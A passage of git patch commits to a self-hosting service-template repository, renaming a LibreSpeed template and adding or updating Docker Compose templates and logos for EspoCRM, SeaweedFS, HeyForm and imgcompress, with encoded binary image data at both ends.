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
S><om-!tSZu&A;>b#s2{)wB@$|

literal 0
HcmV?d00001


From 1a8441b230935dbb3325965a1fd16e29f55408d6 Mon Sep 17 00:00:00 2001
From: Diogo Carvalho <diogocarvalho_@live.com.pt>
Date: Wed, 25 Feb 2026 23:28:20 +0000
Subject: [PATCH 025/213] Rename speedtest to librespeed

---
 templates/compose/{speedtest.yaml => librespeed.yaml} | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
 rename templates/compose/{speedtest.yaml => librespeed.yaml} (72%)

diff --git a/templates/compose/speedtest.yaml b/templates/compose/librespeed.yaml
similarity index 72%
rename from templates/compose/speedtest.yaml
rename to templates/compose/librespeed.yaml
index e0d915fe7..fae2650f9 100644
--- a/templates/compose/speedtest.yaml
+++ b/templates/compose/librespeed.yaml
@@ -1,16 +1,16 @@
 # documentation: https://github.com/librespeed/speedtest
-# slogan: Self-hosted Speed Test for HTML5 and more.
+# slogan: Self-hosted lightweight Speed Test.
 # category: devtools
 # tags: speedtest, internet-speed
-# logo: svgs/speedtest.svg
+# logo: svgs/librespeed.svg
 # port: 82
 
 services:
-  speedtest:
-    container_name: speedtest
+  librespeed:
+    container_name: librespeed
     image: 'ghcr.io/librespeed/speedtest:latest'
     environment:
-      - SERVICE_URL_SPEEDTEST_82
+      - SERVICE_URL_LIBRESPEED_82
       - MODE=standalone
       - TELEMETRY=false
       - DISTANCE=km

From 34e9f97b79319ea8e09e286c9617ba405fa7d462 Mon Sep 17 00:00:00 2001
From: Diogo Carvalho <diogocarvalho_@live.com.pt>
Date: Wed, 25 Feb 2026 23:48:15 +0000
Subject: [PATCH 026/213] Fix logo format

---
 templates/compose/librespeed.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/librespeed.yaml b/templates/compose/librespeed.yaml
index fae2650f9..6e53a3aff 100644
--- a/templates/compose/librespeed.yaml
+++ b/templates/compose/librespeed.yaml
@@ -2,7 +2,7 @@
 # slogan: Self-hosted lightweight Speed Test.
 # category: devtools
 # tags: speedtest, internet-speed
-# logo: svgs/librespeed.svg
+# logo: svgs/librespeed.png
 # port: 82
 
 services:

From 30e65abf1be972e52a20f8d95a9351aaa039b018 Mon Sep 17 00:00:00 2001
From: Taras Machyshyn <tmachyshyn@users.noreply.github.com>
Date: Fri, 27 Feb 2026 20:23:24 +0200
Subject: [PATCH 027/213] Added EspoCRM

---
 public/svgs/espocrm.svg        | 82 ++++++++++++++++++++++++++++++++++
 templates/compose/espocrm.yaml | 75 +++++++++++++++++++++++++++++++
 2 files changed, 157 insertions(+)
 create mode 100644 public/svgs/espocrm.svg
 create mode 100644 templates/compose/espocrm.yaml

diff --git a/public/svgs/espocrm.svg b/public/svgs/espocrm.svg
new file mode 100644
index 000000000..79d96f8c3
--- /dev/null
+++ b/public/svgs/espocrm.svg
@@ -0,0 +1,82 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<svg
+   width="379.36536"
+   height="83.256203"
+   enable-background="new 0 0 307.813 75"
+   overflow="visible"
+   version="1.1"
+   viewBox="0 0 303.49228 66.604962"
+   xml:space="preserve"
+   id="svg20"
+   sodipodi:docname="logo2.svg"
+   inkscape:version="1.1.2 (0a00cf5339, 2022-02-04)"
+   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
+   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
+   xmlns="http://www.w3.org/2000/svg"
+   xmlns:svg="http://www.w3.org/2000/svg"><defs
+   id="defs24" /><sodipodi:namedview
+   id="namedview22"
+   pagecolor="#ffffff"
+   bordercolor="#666666"
+   borderopacity="1.0"
+   inkscape:pageshadow="2"
+   inkscape:pageopacity="0.0"
+   inkscape:pagecheckerboard="0"
+   showgrid="false"
+   scale-x="0.8"
+   fit-margin-top="0"
+   fit-margin-left="0"
+   fit-margin-right="0"
+   fit-margin-bottom="0"
+   inkscape:zoom="2.172956"
+   inkscape:cx="109.75832"
+   inkscape:cy="79.384949"
+   inkscape:window-width="1920"
+   inkscape:window-height="1074"
+   inkscape:window-x="0"
+   inkscape:window-y="0"
+   inkscape:window-maximized="1"
+   inkscape:current-layer="svg20" />
+	
+	<switch
+   transform="matrix(1.089,0,0,1.089,-14.949525,-4.9304545)"
+   id="switch18">
+		<foreignObject
+   width="1"
+   height="1"
+   requiredExtensions="http://ns.adobe.com/AdobeIllustrator/10.0/">
+			
+		</foreignObject>
+		<g
+   transform="matrix(0.96767,0,0,0.96767,3.9659,-1.2011)"
+   id="g16">
+					
+						<path
+   d="m 169.53,21.864 c -7.453,2.972 -9.569,11.987 -9.005,19.212 1.587,2.982 3.845,5.562 5.783,8.312 l 4.262,-1.083 c -1.796,-4.447 -1.689,-9.424 -0.806,-14.066 0.585,-3.001 2.309,-6.476 5.634,-7.032 5.307,-0.847 10.733,-0.271 16.088,-0.369 0.091,-2.196 0.115,-4.392 0.107,-6.585 -7.333,0.387 -15.043,-1.038 -22.063,1.611 z m 52.714,-1.294 c -8.12,-0.952 -16.332,-0.149 -24.492,-0.387 -0.021,6.43 -0.003,12.854 0.078,19.274 2.625,-0.849 5.251,-1.739 7.909,-2.532 0.042,-3.272 0.028,-6.527 -0.071,-9.789 4.869,-0.029 9.874,-0.757 14.639,0.451 1.838,0.298 2.051,2.25 2.687,3.641 2.541,-0.891 5.111,-1.717 7.672,-2.574 -0.703,-4.246 -4.129,-7.633 -8.422,-8.084 z m 23.522,-0.593 c -3.954,0.072 -7.912,0.064 -11.864,0.047 0.051,2.544 0.063,5.074 0.072,7.617 4.263,-1.482 8.553,-2.889 12.848,-4.268 -0.35,-1.128 -0.706,-2.268 -1.056,-3.396 z"
+   fill="#6a3201"
+   id="path2" />
+						<path
+   d="m 161.96,69.125 c 7.886,-3.717 15.757,-7.463 23.72,-11.018 5.563,0.359 11.146,0.021 16.722,0.193 1.14,-0.036 2.292,-0.061 3.432,-0.088 -0.011,-3.195 -0.025,-6.38 -0.082,-9.564 3.428,-1.502 10.227,-4.623 10.227,-4.623 l 15.215,13.941 11.096,0.106 -0.715,-26.236 0.803,-0.211 9.005,26.344 8.834,-0.066 8.99,-28.394 -0.308,28.434 8.074,-0.021 -0.231,-37.932 -9.279,0.071 30.625,-14.141 c 0,0 -37.593,14.279 -56.404,21.385 -2.996,1.022 -5.878,2.315 -8.853,3.394 -2.278,0.867 -4.558,1.713 -6.834,2.58 -20.071,7.526 -39.945,15.604 -60.126,22.803 C 159.094,45.56 150.557,36.228 144.103,25.497 Z m 72.116,-17.961 c -0.108,0.154 -0.324,0.458 -0.429,0.611 -3.448,-3.018 -6.765,-6.189 -10.21,-9.205 1.745,-1.096 3.47,-2.242 5.026,-3.597 1.625,-1.386 3.479,-2.469 5.345,-3.499 0.293,5.227 0.258,10.452 0.268,15.69 z m 23.942,-9.67 c -0.857,2.578 -1.825,5.137 -2.793,7.682 -1.644,-6.217 -3.94,-12.238 -5.856,-18.383 -0.119,-0.52 -0.366,-1.574 -0.487,-2.093 3.428,-1.709 10.585,-4.854 15.229,-6.815 -1.647,5.969 -4.306,14.029 -6.093,19.609 z"
+   fill="#ffb300"
+   id="path4" />
+					
+					<g
+   fill="#6a3201"
+   id="g14">
+						<path
+   d="M 45.672,58.148 H 27.146 c -2.861,0 -5.614,-0.651 -8.257,-1.953 -2.861,-1.409 -5.043,-3.651 -6.547,-6.725 -1.503,-3.074 -2.254,-6.455 -2.254,-10.145 0,-3.652 0.724,-6.961 2.173,-9.926 1.594,-3.219 3.803,-5.569 6.628,-7.052 1.557,-0.795 3.052,-1.355 4.482,-1.682 1.43,-0.325 3.07,-0.488 4.917,-0.488 h 17.168 v 6.789 H 29.57 c -1.415,0 -2.602,0.187 -3.563,0.558 -0.961,0.372 -1.912,1.037 -2.855,1.994 -0.943,0.957 -1.597,1.887 -1.959,2.791 -0.363,0.902 -0.543,2.027 -0.543,3.375 h 25.023 v 6.789 H 20.648 c 0,1.24 0.164,2.325 0.491,3.256 0.327,0.93 0.919,1.887 1.776,2.871 0.856,0.985 1.749,1.732 2.677,2.242 0.929,0.512 2.03,0.767 3.306,0.767 h 16.774 z"
+   id="path6" />
+						<path
+   d="m 76.499,49.519 c 0,2.397 -0.771,4.449 -2.312,6.154 -1.541,1.706 -3.49,2.56 -5.846,2.56 H 49.688 V 53.12 h 15.326 c 1.087,0 2.001,-0.272 2.744,-0.817 0.743,-0.545 1.115,-1.327 1.115,-2.345 0,-2.362 -1.595,-3.543 -4.783,-3.543 h -7.825 c -1.666,0 -3.278,-0.79 -4.836,-2.369 -1.559,-1.58 -2.336,-3.287 -2.336,-5.119 0,-2.585 0.579,-4.667 1.738,-6.248 1.34,-1.794 3.313,-2.692 5.922,-2.692 h 17.928 v 5.364 H 58.743 c -0.614,0 -1.147,0.289 -1.599,0.868 -0.452,0.579 -0.677,1.235 -0.677,1.972 0,0.807 0.298,1.498 0.896,2.076 0.597,0.579 1.311,0.867 2.144,0.867 h 8.415 c 2.643,0 4.733,0.79 6.271,2.369 1.536,1.579 2.306,3.584 2.306,6.016 z"
+   id="path8" />
+						<path
+   d="m 109.29,43.414 c 0,4.495 -1.166,8.074 -3.497,10.738 -2.331,2.664 -5.395,3.996 -9.188,3.996 H 88.419 V 68.457 H 80.792 V 29.985 h 15.09 c 4.27,0 7.6,1.269 9.989,3.806 2.279,2.428 3.419,5.637 3.419,9.623 z m -7.627,0.405 c 0,-2.356 -0.754,-4.286 -2.262,-5.793 -1.509,-1.505 -3.388,-2.258 -5.641,-2.258 h -5.341 v 16.429 h 5.886 c 2.179,0 3.951,-0.771 5.313,-2.313 1.363,-1.54 2.045,-3.562 2.045,-6.065 z"
+   id="path10" />
+						<path
+   d="m 145.1,43.967 c 0,4.896 -1.557,8.65 -4.669,11.261 -2.86,2.394 -6.751,3.591 -11.673,3.591 -4.923,0 -8.742,-1.087 -11.456,-3.264 -3.15,-2.502 -4.724,-6.401 -4.724,-11.696 0,-4.424 1.701,-7.906 5.104,-10.446 3.04,-2.283 6.786,-3.427 11.238,-3.427 4.887,0 8.805,1.225 11.754,3.673 2.949,2.448 4.426,5.884 4.426,10.308 z m -8.382,-0.065 c 0,-2.285 -0.716,-4.197 -2.146,-5.738 -1.432,-1.54 -3.379,-2.312 -5.841,-2.312 -2.246,0 -4.103,0.79 -5.57,2.366 -1.467,1.577 -2.2,3.563 -2.2,5.955 0,2.756 0.743,4.949 2.228,6.581 1.485,1.632 3.405,2.448 5.76,2.448 2.679,0 4.673,-0.852 5.977,-2.557 1.193,-1.557 1.792,-3.805 1.792,-6.743 z"
+   id="path12" />
+					</g>
+				</g>
+	</switch>
+	
+</svg>
diff --git a/templates/compose/espocrm.yaml b/templates/compose/espocrm.yaml
new file mode 100644
index 000000000..d771e0f53
--- /dev/null
+++ b/templates/compose/espocrm.yaml
@@ -0,0 +1,75 @@
+# documentation: https://docs.espocrm.com
+# slogan: EspoCRM is a free and open-source CRM platform.
+# category: cms
+# tags: crm, self-hosted, open-source, workflow, automation, project management
+# logo: svgs/espocrm.svg
+# port: 80
+
+services:
+  espocrm:
+    image: espocrm/espocrm:latest
+    environment:
+      - SERVICE_URL_ESPOCRM
+      - ESPOCRM_ADMIN_USERNAME=${ESPOCRM_ADMIN_USERNAME:-admin}
+      - ESPOCRM_ADMIN_PASSWORD=${ESPOCRM_ADMIN_PASSWORD:-password}
+      - ESPOCRM_DATABASE_PLATFORM=Mysql
+      - ESPOCRM_DATABASE_HOST=espocrm-db
+      - ESPOCRM_DATABASE_NAME=${MARIADB_DATABASE:-espocrm}
+      - ESPOCRM_DATABASE_USER=${SERVICE_USER_MARIADB}
+      - ESPOCRM_DATABASE_PASSWORD=${SERVICE_PASSWORD_MARIADB}
+      - ESPOCRM_SITE_URL=${SERVICE_URL_ESPOCRM}
+    volumes:
+      - espocrm:/var/www/html
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://127.0.0.1:80"]
+      interval: 2s
+      start_period: 60s
+      timeout: 10s
+      retries: 15
+    depends_on:
+      espocrm-db:
+        condition: service_healthy
+
+  espocrm-daemon:
+    image: espocrm/espocrm:latest
+    container_name: espocrm-daemon
+    volumes:
+      - espocrm:/var/www/html
+    restart: always
+    entrypoint: docker-daemon.sh
+    depends_on:
+      espocrm:
+        condition: service_healthy
+
+  espocrm-websocket:
+    image: espocrm/espocrm:latest
+    container_name: espocrm-websocket
+    environment:
+      - SERVICE_URL_ESPOCRM_WEBSOCKET_8080
+      - ESPOCRM_CONFIG_USE_WEB_SOCKET=true
+      - ESPOCRM_CONFIG_WEB_SOCKET_URL=$SERVICE_URL_ESPOCRM_WEBSOCKET
+      - ESPOCRM_CONFIG_WEB_SOCKET_ZERO_M_Q_SUBSCRIBER_DSN=tcp://*:7777
+      - ESPOCRM_CONFIG_WEB_SOCKET_ZERO_M_Q_SUBMISSION_DSN=tcp://espocrm-websocket:7777
+    volumes:
+      - espocrm:/var/www/html
+    restart: always
+    entrypoint: docker-websocket.sh
+    depends_on:
+      espocrm:
+        condition: service_healthy
+
+  espocrm-db:
+    image: mariadb:latest
+    environment:
+      - MARIADB_DATABASE=${MARIADB_DATABASE:-espocrm}
+      - MARIADB_USER=${SERVICE_USER_MARIADB}
+      - MARIADB_PASSWORD=${SERVICE_PASSWORD_MARIADB}
+      - MARIADB_ROOT_PASSWORD=${SERVICE_PASSWORD_ROOT}
+    volumes:
+      - espocrm-db:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 20s
+      start_period: 10s
+      timeout: 10s
+      retries: 3

From a2540bd23326b92f35caa797392c97a0a7c0dd51 Mon Sep 17 00:00:00 2001
From: Taras Machyshyn <tmachyshyn@users.noreply.github.com>
Date: Fri, 27 Feb 2026 20:42:20 +0200
Subject: [PATCH 028/213] Admin password

---
 templates/compose/espocrm.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/templates/compose/espocrm.yaml b/templates/compose/espocrm.yaml
index d771e0f53..130562a78 100644
--- a/templates/compose/espocrm.yaml
+++ b/templates/compose/espocrm.yaml
@@ -11,7 +11,7 @@ services:
     environment:
       - SERVICE_URL_ESPOCRM
       - ESPOCRM_ADMIN_USERNAME=${ESPOCRM_ADMIN_USERNAME:-admin}
-      - ESPOCRM_ADMIN_PASSWORD=${ESPOCRM_ADMIN_PASSWORD:-password}
+      - ESPOCRM_ADMIN_PASSWORD=${SERVICE_PASSWORD_ADMIN}
       - ESPOCRM_DATABASE_PLATFORM=Mysql
       - ESPOCRM_DATABASE_HOST=espocrm-db
       - ESPOCRM_DATABASE_NAME=${MARIADB_DATABASE:-espocrm}

From 45d991565e31a45c8bc41018f3123043a77886fa Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?F=C3=A1bio=20Henrique=20Ara=C3=BAjo?=
 <contato@fabioharaujo.com.br>
Date: Mon, 2 Mar 2026 20:04:29 -0300
Subject: [PATCH 029/213] Update SeaweedFS images to version 4.13

---
 templates/compose/seaweedfs.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates/compose/seaweedfs.yaml b/templates/compose/seaweedfs.yaml
index d8b57906b..fabcca50d 100644
--- a/templates/compose/seaweedfs.yaml
+++ b/templates/compose/seaweedfs.yaml
@@ -7,7 +7,7 @@
 
 services:
   seaweedfs-master:
-    image: chrislusf/seaweedfs:4.05
+    image: chrislusf/seaweedfs:4.13
     environment:
       - SERVICE_URL_S3_8333
       - AWS_ACCESS_KEY_ID=${SERVICE_USER_S3}
@@ -61,7 +61,7 @@ services:
       retries: 10
 
   seaweedfs-admin:
-    image: chrislusf/seaweedfs:4.05
+    image: chrislusf/seaweedfs:4.13
     environment:
       - SERVICE_URL_ADMIN_23646
       - SEAWEED_USER_ADMIN=${SERVICE_USER_ADMIN}

From 01459df60dc9fcba95af190123aedb0f901f390a Mon Sep 17 00:00:00 2001
From: mufeng <mufeng.me@gmail.com>
Date: Tue, 3 Mar 2026 17:57:00 +0800
Subject: [PATCH 030/213] fix(template): fix heyform template

---
 templates/compose/heyform.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates/compose/heyform.yaml b/templates/compose/heyform.yaml
index f88a1efec..9afddf895 100644
--- a/templates/compose/heyform.yaml
+++ b/templates/compose/heyform.yaml
@@ -3,7 +3,7 @@
 # category: productivity
 # tags: form, builder, forms, survey, quiz, open source, self-hosted, docker
 # logo: svgs/heyform.svg
-# port: 8000
+# port: 9157
 
 services:
   heyform:
@@ -16,7 +16,7 @@ services:
       keydb:
         condition: service_healthy
     environment:
-      - SERVICE_URL_HEYFORM_8000
+      - SERVICE_URL_HEYFORM_9157
       - APP_HOMEPAGE_URL=${SERVICE_URL_HEYFORM}
       - SESSION_KEY=${SERVICE_BASE64_64_SESSION}
       - FORM_ENCRYPTION_KEY=${SERVICE_BASE64_64_FORM}
@@ -25,7 +25,7 @@ services:
       - REDIS_PORT=6379
       - REDIS_PASSWORD=${SERVICE_PASSWORD_KEYDB}
     healthcheck:
-      test: ["CMD-SHELL", "wget -qO- http://127.0.0.1:8000 || exit 1"]
+      test: ["CMD-SHELL", "wget -qO- http://127.0.0.1:9157 || exit 1"]
       interval: 5s
       timeout: 5s
       retries: 3

From 5585e68b38f775922efcdb73468c0a40a2e36a92 Mon Sep 17 00:00:00 2001
From: Ariq Pradipa Santoso <ariq.pradipa@outlook.com>
Date: Wed, 4 Mar 2026 12:07:52 +0700
Subject: [PATCH 031/213] Add imgcompress service configuration for offline
 image processing

- Introduced a new YAML configuration file for imgcompress service.
- Configured the service with environment variables for customization.
---
 public/svgs/imgcompress.png        | Bin 0 -> 94029 bytes
 templates/compose/imgcompress.yaml |  21 +++++++++++++++++++++
 2 files changed, 21 insertions(+)
 create mode 100644 public/svgs/imgcompress.png
 create mode 100644 templates/compose/imgcompress.yaml

diff --git a/public/svgs/imgcompress.png b/public/svgs/imgcompress.png
new file mode 100644
index 0000000000000000000000000000000000000000..9eb04c3a7a9630fcd5932d30851623d8a20e350b
GIT binary patch
literal 94029
zcmV)lK%c*fP)<h;3K|Lk000e1NJLTq00961007Sj1^@s68oLj(00961Nkl<Zc%1Bg
zcc3LjmG|#dRd?TfUrzHT&%g{h4N;O90YwQWOkj>{{&ZKx?CzR&6;WKlgaI=_5fl)H
zoQGkC0Vbz6^WuFscXw5t?~m?#-+gc14CorrrSviP_U*3juBvnDoZm^nGwm<g2!H?}
z0jT&-#((rD_e21QqQ5`C$(FzPnJyA7cX+1#A8yYqfIq)Ah`sUI0N`mS5Ww*fDFhx}
zx6XV0>tElwX3d&}F~;ra=tyO=$?l-8=S@ybru;B;{8}wxEyy8~uohNWGR#&f#X^9E
z5;~X51#S8EN-~u!3dlmaRGKXNesyeYtQLl0uw==S@WjJU^e?;evf(fcn-9o)yh8IQ
z8Gmk^V)uUfGwq+LJ;MN=dTZS^_aJtqBn~~aCndvd?~bv`^5NmpzOJ60-XI7ME0ro8
zBq@<jWb#C6u;%+o3sR(%QcA(~QZURQk`Y&7fQSHVVZpGlfDj-8EHeZMh?$GE7D2rZ
zk^;sWBa8_XgdpL%z8}=LR%?|prDT|I&+YbW;p$r84=tKM|B20;@82?aZnyu$6BFey
z)O&kp*}^+GW(?1?f1>sb1K4|`7NTzwJjLSpx#ymi|NZapJ0zdaFD{qD<0Yy2A=~{m
zxZ8CTDPssiI*>xbQ4W|H0s@c<Bo&MSjI|tU%~~7V+;oXqkcbG}a&$*Qu+}m&!!nZ;
zlC8A_FbSm~r9(<OL`s6d1RKDz1~W%Y!!oqifB^&xILerMFj6K<m4usES1ngJ5A^kJ
z9vPc>AlIqJmM@vR;rid*HbO$cTD!L~u`P_@nf4Fbo?!sfTdP=a8V98m7#y6tpcd4Q
ztJVBNT_<@`5Yk*B<e*Y6JTDJe0h#a+2#dfEjkT7;dL8v@83ZON2v&#0YzWNoT$l3s
zJSP)LxSmUb0EPvKxkddaW@eBe1_PGC01F|B*#ICI2CCI6S1NTX7E3Ue*>N2PNdkzC
zW|qQ%n@q9mC0UUq0xQP_1O$BFhY$o4FoLiGAu9-jV3$;4mmt2AjosAO*LAm2YU87i
zuH9~oX{t4i;c1Z)o>3kC!P+wnAZo2UJ%|X$9k*Y0^Y+@&e$78Q2!d0ja*kk`O$+71
zaXd(JVJ&GLhE%DHTV_i^=#wLe^7%YT1zNUjksX{fK#61uOPB74g$ouSmr0U@<zym3
zon2k%>g?jSwmgvlqAi<=NJNAVP$cRz6A`gxShg&L0y7hVQLFnHpP0bd$T&|-PLd7{
z0OB1xcG23kYcM)G%0Z~HW!rXa*t7|NLbY1Q<YbW*NtSK`q+FXwq>xM|$g+Wuj$$?l
zgF18&z=SopZa5xl`)DTNJ>rM{UA<i$_rBl-2W|ZC|Ncd7hLq5XCp@DvJk8txWd_gy
